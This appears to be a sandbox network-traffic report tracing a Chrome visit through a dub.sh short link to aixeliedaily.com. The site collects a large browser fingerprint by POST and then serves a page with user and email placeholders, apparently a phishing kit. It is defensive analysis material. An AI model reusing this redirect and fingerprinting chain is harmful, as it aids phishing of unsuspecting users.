                          Oct 23, 2024 22:58:12.568725109 CEST6120653192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:12.568902969 CEST6059253192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:12.847182989 CEST53612061.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:12.871437073 CEST53605921.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:23.261214972 CEST53517731.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:42.042629957 CEST53505351.1.1.1192.168.2.16
                          Oct 23, 2024 22:59:04.890264988 CEST53603091.1.1.1192.168.2.16
                          Oct 23, 2024 22:59:04.987246990 CEST53565471.1.1.1192.168.2.16
                          Oct 23, 2024 22:59:13.054483891 CEST138138192.168.2.16192.168.2.255
                          Oct 23, 2024 22:59:33.155086040 CEST53635151.1.1.1192.168.2.16

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 23, 2024 22:58:05.912796974 CEST192.168.2.161.1.1.10xf85bStandard query (0)dub.shA (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:05.913094044 CEST192.168.2.161.1.1.10xa0f9Standard query (0)dub.sh65IN (0x0001)false
                          Oct 23, 2024 22:58:06.797046900 CEST192.168.2.161.1.1.10x8b00Standard query (0)aixeliedaily.comA (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:06.797365904 CEST192.168.2.161.1.1.10x400dStandard query (0)aixeliedaily.com65IN (0x0001)false
                          Oct 23, 2024 22:58:09.834049940 CEST192.168.2.161.1.1.10x1633Standard query (0)www.google.comA (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:09.834203005 CEST192.168.2.161.1.1.10x317Standard query (0)www.google.com65IN (0x0001)false
                          Oct 23, 2024 22:58:09.997935057 CEST192.168.2.161.1.1.10xb48dStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:09.998111010 CEST192.168.2.161.1.1.10x1d75Standard query (0)cdn.socket.io65IN (0x0001)false
                          Oct 23, 2024 22:58:11.490041018 CEST192.168.2.161.1.1.10xd116Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:11.490454912 CEST192.168.2.161.1.1.10xe40Standard query (0)cdn.socket.io65IN (0x0001)false
                          Oct 23, 2024 22:58:12.568725109 CEST192.168.2.161.1.1.10xc3c6Standard query (0)aixeliedaily.comA (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:12.568902969 CEST192.168.2.161.1.1.10x1570Standard query (0)aixeliedaily.com65IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 23, 2024 22:58:05.931155920 CEST1.1.1.1192.168.2.160xf85bNo error (0)dub.sh76.76.21.123A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:05.931155920 CEST1.1.1.1192.168.2.160xf85bNo error (0)dub.sh76.76.21.93A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:07.077424049 CEST1.1.1.1192.168.2.160x8b00No error (0)aixeliedaily.com192.254.233.44A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:09.841551065 CEST1.1.1.1192.168.2.160x317No error (0)www.google.com65IN (0x0001)false
                          Oct 23, 2024 22:58:09.841928005 CEST1.1.1.1192.168.2.160x1633No error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:10.006463051 CEST1.1.1.1192.168.2.160xb48dNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          Oct 23, 2024 22:58:10.006463051 CEST1.1.1.1192.168.2.160xb48dNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:10.006463051 CEST1.1.1.1192.168.2.160xb48dNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:10.006463051 CEST1.1.1.1192.168.2.160xb48dNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:10.006463051 CEST1.1.1.1192.168.2.160xb48dNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:10.007034063 CEST1.1.1.1192.168.2.160x1d75No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          Oct 23, 2024 22:58:11.499572992 CEST1.1.1.1192.168.2.160xe40No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          Oct 23, 2024 22:58:11.502469063 CEST1.1.1.1192.168.2.160xd116No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          Oct 23, 2024 22:58:11.502469063 CEST1.1.1.1192.168.2.160xd116No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:11.502469063 CEST1.1.1.1192.168.2.160xd116No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:11.502469063 CEST1.1.1.1192.168.2.160xd116No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:11.502469063 CEST1.1.1.1192.168.2.160xd116No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                          Oct 23, 2024 22:58:12.847182989 CEST1.1.1.1192.168.2.160xc3c6No error (0)aixeliedaily.com192.254.233.44A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • dub.sh
                          • aixeliedaily.com
                          • https:
                            • cdn.socket.io
                          • fs.microsoft.com
                          • slscr.update.microsoft.com

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.164969976.76.21.1234436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:06 UTC656OUTGET /vu352zF HTTP/1.1
                          Host: dub.sh
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:06 UTC721INHTTP/1.1 302 Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Type: text/html
                          Date: Wed, 23 Oct 2024 20:58:06 GMT
                          Location: https://aixeliedaily.com/m/
                          Referrer-Policy: no-referrer-when-downgrade
                          Server: Vercel
                          Set-Cookie: dub_id=IefPeh69CfhNBO6z; Path=/vu352zF; Expires=Wed, 23 Oct 2024 21:58:06 GMT; Max-Age=3600
                          Strict-Transport-Security: max-age=63072000
                          X-Dns-Prefetch-Control: on
                          X-Frame-Options: DENY
                          X-Middleware-Set-Cookie: dub_id=IefPeh69CfhNBO6z; Path=/vu352zF; Expires=Wed, 23 Oct 2024 21:58:06 GMT; Max-Age=3600
                          X-Powered-By: Dub.co - Link management for modern marketing teams
                          X-Vercel-Id: cle1::p5rzn-1729717086645-27465188c434
                          Connection: close
                          Transfer-Encoding: chunked
                          2024-10-23 20:58:06 UTC147INData Raw: 38 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 68 74 74 70 73 3a 2f 2f 76 65 72 63 65 6c 2e 61 70 70 20 2d 2d 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 20 28 33 30 32 29 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 69 78 65 6c 69 65 64 61 69 6c 79 2e 63 6f 6d 2f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 0a 0d 0a
                          Data Ascii: 8d<!doctype html>... https://vercel.app --><h1>Redirecting (302)</h1>The document has moved<a href="https://aixeliedaily.com/m/">here</a>
                          2024-10-23 20:58:06 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.1649701192.254.233.444436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:07 UTC661OUTGET /m/ HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:08 UTC208INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:07 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                          2024-10-23 20:58:08 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                          Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.1649704192.254.233.444436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:08 UTC820OUTPOST /m/ HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          Content-Length: 138444
                          Cache-Control: max-age=0
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          Origin: https://aixeliedaily.com
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          Referer: https://aixeliedaily.com/m/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                          Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72
                          Data Ascii: mDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefaultController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStream%22%3A%22function+Wr
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45 6e 74 72 79 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45 6e 74 72 79 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73
                          Data Ascii: 22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverEntry%22%3A%22function+ResizeObserverEntry%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Res
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 70 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 70 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44
                          Data Ascii: Element%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMapElement%22%3A%22function+HTMLMapElement%28%29+%7B+%5Bnative+code%5D+%7D
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 63 63
                          Data Ascii: AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%22%3A%22function+AbsoluteOrientationSensor%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Acc
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 61 6b 65 4c 6f 63 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 61 6b 65 4c 6f 63 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35
                          Data Ascii: esult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WakeLock%22%3A%22function+WakeLock%28%29+%7B+%5Bnative+code%5
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d 65 6e 74 41 75 64 69 6f 53 6f 75 72 63 65 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 43 61 70 61 62 69 6c 69 74 69 65 73 25 32 32 25 32 43 25 32 32 4d 61 74 68 4d 4c 45 6c 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 4c 6f 63 61 74 69 6f 6e 25 32
                          Data Ascii: %22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElementAudioSourceNode%22%2C%22MediaCapabilities%22%2C%22MathMLElement%22%2C%22Location%2
                          2024-10-23 20:58:08 UTC16384OUTData Raw: 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 42 6c 75 65 74 6f 6f 74 68 55 55 49 44 25 32 32 25 32 43 25 32 32 42 72 6f 77 73 65 72 43 61 70 74 75 72 65 4d 65 64 69 61 53 74 72 65 61 6d 54 72 61 63 6b 25 32 32 25 32 43 25 32 32 43 72 6f 70 54 61 72 67 65 74 25
                          Data Ascii: nTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistration%22%2C%22BluetoothUUID%22%2C%22BrowserCaptureMediaStreamTrack%22%2C%22CropTarget%
                          2024-10-23 20:58:08 UTC7372OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 4e 53 52 65 73 6f 6c 76 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 4e 53 52 65 73 6f 6c 76 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 4e 6f 64 65 49 74 65 72 61 74 6f 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 4e 6f 64 65 49 74 65 72 61 74 6f 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 50 72 6f 63 65 73 73 69 6e 67 49 6e 73 74 72 75 63 74 69 6f 6e 25 32 32 25 33 41 25 32 32 66 75 6e 63 74
                          Data Ascii: Bnative+code%5D+%7D%22%2C%22createNSResolver%22%3A%22function+createNSResolver%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createNodeIterator%22%3A%22function+createNodeIterator%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createProcessingInstruction%22%3A%22funct
                          2024-10-23 20:58:09 UTC208INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:09 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                          2024-10-23 20:58:09 UTC351INData Raw: 31 35 33 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 55 49 44 58 58 58 27 20 76 69 63 3d 27 45 4d 41 49 4c 58 58 58 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68 4f 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27
                          Data Ascii: 153<!DOCTYPE html><html id='html' sti='UIDXXX' vic='EMAILXXX' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.1649703192.254.233.444436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:09 UTC528OUTGET /m/TYPEXXX HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://aixeliedaily.com/m/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:10 UTC387INHTTP/1.1 404 Not Found
                          Date: Wed, 23 Oct 2024 20:58:10 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <https://aixeliedaily.com/index.php/wp-json/>; rel="https://api.w.org/"
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
